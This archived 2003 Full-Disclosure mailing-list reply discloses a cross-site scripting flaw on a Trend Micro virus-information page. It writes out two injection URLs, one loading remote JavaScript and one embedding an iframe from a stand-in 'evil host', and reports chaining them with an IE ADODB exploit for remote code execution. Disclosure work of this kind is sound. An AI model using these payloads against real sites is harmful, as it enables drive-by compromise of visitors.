Re: [Full-Disclosure] Selfmade worms in the wild ;)

From: morning_wood (se_cur_ity_at_hotmail.com)
Date: 08/30/03

Next message: Larry W. Cashdollar: "Re: [Full-Disclosure] Authorities eye MSBlaster suspect"

Previous message: Darren Reed: "Re: [Full-Disclosure] Authorities eye MSBlaster suspect"
In reply to: Redaktion-Kryptocrew: "[Full-Disclosure] Selfmade worms in the wild ;)"
Next in thread: Redaktion-Kryptocrew: "Re[2]: [Full-Disclosure] Selfmade worms in the wild ;)"
Reply: Redaktion-Kryptocrew: "Re[2]: [Full-Disclosure] Selfmade worms in the wild ;)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: "Redaktion-Kryptocrew" <momolly@kryptocrew.de>, <full-disclosure@lists.netsys.com>
Date: Sat, 30 Aug 2003 03:14:03 -0700

well... lets see, we could make it an untrusted link by

"
http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756&
VName=WORM_MSBLAST.<script%20language="JavaScript"%20src="http://www.astalavista
.com/backend/news.js"%20type="text/javascript"></script> "

and include some remote javascript of our choice, or the latest IE ADODB explot.
the obvious choice for that would be the classic..

http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756&
VName=WORM_MSBLAST.<iframe
src="http://some-evil-host/script/orhtml/etc/bla/"></iframe>

for everones info, the above was tested with the ADODB exploit to execute
remote code... sucessfully i might add. ( unpatched IE )

this goes to show that XSS is still very much a security concern, especially
coupled together with the lastest browser exploit to become a very dangerous
vector of attack, especially by way of a previously "trusted" URL.

this is not looking real good for trend.

good job Mo 8-)

morning_wood
http://exploitlabs.com
http://e2-labs.com

----- Original Message -----
From: "Redaktion-Kryptocrew" <momolly@kryptocrew.de>
To: <full-disclosure@lists.netsys.com>
Sent: Friday, August 29, 2003 12:02 AM
Subject: [Full-Disclosure] Selfmade worms in the wild ;)

> You can change id's and names...
> -mo-
> Kryptocrew
> .: your security advisor team :. mailto:momolly@kryptocrew.de
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: Larry W. Cashdollar: "Re: [Full-Disclosure] Authorities eye MSBlaster suspect"

Previous message: Darren Reed: "Re: [Full-Disclosure] Authorities eye MSBlaster suspect"
In reply to: Redaktion-Kryptocrew: "[Full-Disclosure] Selfmade worms in the wild ;)"
Next in thread: Redaktion-Kryptocrew: "Re[2]: [Full-Disclosure] Selfmade worms in the wild ;)"
Reply: Redaktion-Kryptocrew: "Re[2]: [Full-Disclosure] Selfmade worms in the wild ;)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]